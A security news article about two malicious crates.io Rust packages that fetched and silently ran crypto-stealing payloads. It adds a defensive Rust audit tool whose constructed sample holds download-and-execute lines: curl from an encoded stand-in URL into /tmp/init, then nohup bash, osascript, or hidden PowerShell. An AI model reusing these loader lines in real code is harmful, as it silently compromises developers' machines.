A malicious Rust package found to be downloading payloads aimed at stealing cryptocurrency has been removed from the crates.io Rust package registry, along with a second package by the same author that appeared benign but pulled in the first as a dependency.
The crates.io team removed both packages this week after security researchers with Socket alerted it about them. By then, however, the packages had been in the registry for eight months; the malicious crate, evm-units, had been downloaded 7,257 times and the second, uniswap-utils, 7,441 times. (crates.io download counts include automated mirroring and scanning, so they overstate the number of developers who actually built against the crates.)
Thirteen versions of evm-units, targeting Web3 developers, were published in April, along with 14 versions of uniswap-utils, which depended on it, the crates.io team wrote in a notice.
According to the Socket Threat Research team, the evm-units package, which passed itself off as an EVM version helper, could target systems running Windows, Linux and macOS. An EVM version helper is a utility for developers working across versions of the EVM, or Ethereum Virtual Machine. Uniswap is a decentralized exchange protocol that runs on Ethereum and other EVM-compatible chains, so a crate named uniswap-utils reads as an ordinary helper library to a Web3 developer.
Malicious Package Appeared Legitimate
Socket threat researcher Olivia Brown wrote that, on a developer's system, the malicious package appeared to do nothing more than return an EVM version number to the unsuspecting victim. That, combined with the ability to run on multiple operating systems and the targeting of systems with Qihoo 360 – a Chinese antivirus tool – “suggests that the threat actor is focusing on Asian markets, as Qihoo 360 is a Chinese-made antivirus with a dominant market share throughout Asia,” Brown wrote in a report.
The compromise began when the victim called get_evm_version(), a function that cloaked the threat by performing a real and plausible task: it returned a version string hard-coded in the malicious crate, she wrote.
“However, calling that function to check the version number begins a series of steps eventually leading to compromise,” Brown added.
That call decoded an obfuscated URL, which kept the server address out of plain view and away from simple string-based analysis, then fetched the payload from it and executed it, dispatching to a different check() function depending on the operating system of the developer's machine.
A Stealthy Threat
She described how the malware's stealth kept its operations out of the victim's sight. On Linux, it downloads a script from the attacker's server, saves it as /tmp/init and runs it in the background under “nohup bash,” detached from the terminal so nothing is written to the console.
“There is no window, no output, no logs printed, so the victim never sees anything,” Brown wrote. “The attacker’s script gains full control, allowing it to run any commands or install any payloads the attacker chooses.”
On macOS, the malware downloads a file called “init” into the system temp folder and executes it with “osascript” in the background, again under “nohup.”
“This again quietly runs the attacker’s AppleScript with no windows, no notifications, and no output, enabling silent second-stage infection,” she wrote.
On Windows, one of the malware's first tasks is checking for the presence of the Qihoo 360 antivirus software.
“If Qihoo 360 is not present, it creates a VBScript that runs a hidden PowerShell script with no visible window, and writes that script into the temp directory,” Brown wrote. “The malware now has two ways to launch. If there is no antivirus, it will launch through the VBScript. Otherwise, if there is Qihoo 360 present, the malware will launch by directly calling PowerShell with no window and no logs printed to the console.”
A Focus on Asia
She added that the “focus on Qihoo 360 is a rare, explicit, China-focused targeting indicator, because it is a leading Chinese internet company. It fits the crypto-theft profile, as Asia is one of the largest global markets for retail cryptocurrency activity.”
In addition, on all three platforms the loader fetched its second stage using a client configuration that, in Brown's description, shields the malware from defensive measures and lets the attacker rotate servers and use self-signed certificates freely. For a reviewer, an HTTP client that accepts untrusted certificates is itself a red flag in a crate that has no business talking to the network at all.
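The behaviours described above lend themselves to a simple static check before a crate is trusted. What follows is an added example, not Socket's tooling and not code from the evm-units crate: a std-only Rust audit pass that scans source text for the loader's tells (a string literal that base64-decodes to an http(s) URL, nohup launches, a /tmp/init drop, osascript, a VBScript or hidden-window PowerShell launcher, a Qihoo 360 presence check, and an HTTP client that accepts self-signed certificates) and runs it over a constructed snippet shaped like the described loader. The exact indicator strings, the -WindowStyle Hidden flag, the 360Safe path and the reqwest danger_accept_invalid_certs option are assumptions; the report does not quote them.

```rust
// Added example (not Socket's code and not from the evm-units crate): a static
// audit pass over Rust source text that flags the loader behaviours described
// in the report. Every indicator string is an assumption about what such a
// loader would contain; the report does not quote the crate's exact strings.

#[derive(Debug, Clone, PartialEq)]
pub struct Finding { pub indicator: &'static str, pub detail: String }

// (needle matched against the lower-cased source, finding id, explanation)
const INDICATORS: &[(&str, &str, &str)] = &[
    ("nohup", "background-launch", "detached background launch via nohup (Linux/macOS stage two)"),
    ("/tmp/init", "temp-drop", "payload dropped to /tmp/init"),
    ("osascript", "applescript-exec", "AppleScript run via osascript (macOS stage two)"),
    ("wscript", "vbscript-launch", "VBScript launcher (Windows path when Qihoo 360 is absent)"),
    ("-windowstyle hidden", "hidden-powershell", "PowerShell with a hidden window (assumed flag)"),
    ("qihoo", "qihoo-check", "Qihoo 360 presence check (assumed string)"),
    ("360safe", "qihoo-check", "Qihoo 360 presence check (assumed install path)"),
    ("danger_accept_invalid_certs", "tls-validation-off", "accepts self-signed TLS certs (assumed reqwest option)"),
];

/// Standard base64 decoder on std only; None for any byte outside the alphabet.
pub fn base64_decode(s: &str) -> Option<Vec<u8>> {
    const ALPHABET: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    let (mut out, mut buf, mut bits) = (Vec::new(), 0u32, 0u32);
    for c in s.bytes() {
        if c == b'=' { break; }                       // padding: stop
        buf = (buf << 6) | ALPHABET.iter().position(|&a| a == c)? as u32;
        bits += 6;
        if bits >= 8 {
            bits -= 8;
            out.push((buf >> bits) as u8);            // exactly 8 bits remain above `bits`
            buf &= (1 << bits) - 1;                   // keep only the leftover low bits
        }
    }
    Some(out)
}

/// Contents of double-quoted string literals; a backslash escape keeps the escaped char.
pub fn string_literals(source: &str) -> Vec<String> {
    let mut out = Vec::new();
    let mut chars = source.chars();
    while let Some(c) = chars.next() {
        if c != '"' { continue; }
        let mut lit = String::new();
        loop {
            match chars.next() {
                Some('\\') => lit.extend(chars.next()),
                Some('"') | None => break,
                Some(c) => lit.push(c),
            }
        }
        out.push(lit);
    }
    out
}

/// Substring indicators plus a base64 sweep: every literal of base64 shape is
/// decoded and flagged when the plaintext is an http(s) URL. Output is sorted
/// by indicator id and de-duplicated.
pub fn audit(source: &str) -> Vec<Finding> {
    let lower = source.to_lowercase();
    let mut findings: Vec<Finding> = INDICATORS.iter()
        .filter(|(needle, _, _)| lower.contains(*needle))
        .map(|&(_, id, why)| Finding { indicator: id, detail: why.to_string() })
        .collect();
    for lit in string_literals(source) {
        if lit.len() < 8 || lit.len() % 4 != 0 { continue; }   // cheap base64 shape check
        if let Some(bytes) = base64_decode(&lit) {
            if let Ok(text) = std::str::from_utf8(&bytes) {
                if text.starts_with("http://") || text.starts_with("https://") {
                    findings.push(Finding { indicator: "encoded-url",
                        detail: format!("string literal decodes to URL: {text}") });
                }
            }
        }
    }
    findings.sort_by(|a, b| a.indicator.cmp(b.indicator));
    findings.dedup_by(|a, b| a.indicator == b.indicator);
    findings
}

// Constructed sample in the shape the report describes (not the real crate's source).
pub const SAMPLE: &str = r#"
pub fn get_evm_version() -> &'static str {
    check("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaW5pdA==");   // obfuscated payload URL
    "0.2.1"                                             // plausible return value
}
#[cfg(target_os = "linux")]
fn check(u: &str) { sh(&format!("curl -s {u} -o /tmp/init && nohup bash /tmp/init >/dev/null 2>&1 &")) }
#[cfg(target_os = "macos")]
fn check(u: &str) { sh(&format!("curl -s {u} -o /tmp/init && nohup osascript /tmp/init >/dev/null 2>&1 &")) }
#[cfg(target_os = "windows")]
fn check(u: &str) {
    let av = std::path::Path::new("C:\\Program Files\\360\\360Safe").exists();
    if !av { sh("wscript //B %TEMP%\\init.vbs") } else { sh("powershell -WindowStyle Hidden -File %TEMP%\\init.ps1") }
}
"#;

fn main() {
    for f in audit(SAMPLE) {
        println!("{:<18} {}", f.indicator, f.detail);
    }
}
```

Run as a binary it prints one line per indicator found in the sample; as a library call, audit(source) returns the sorted, de-duplicated findings. Plain substring hits are noisy on their own (nohup or osascript can legitimately appear in a build script), so the decoded-URL finding is the one that most reliably separates a loader from a helper crate; treat the rest as reasons to read the crate's process::Command calls by hand before adding it to Cargo.toml.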
The malicious Rust crates are the latest example of a growing trend of attackers hiding malware inside open source ecosystems, including npm and GitHub, and especially in crypto infrastructure, she wrote. The threat actor behind the Rust malware, publishing under the name “ablerust,” embedded a cross-platform, second-stage loader inside a function that looked harmless.
“As supply chain compromises continue to increase in sophistication, organizations must remain vigilant when using open source code, as any package may contain hidden behavior,” Brown wrote.

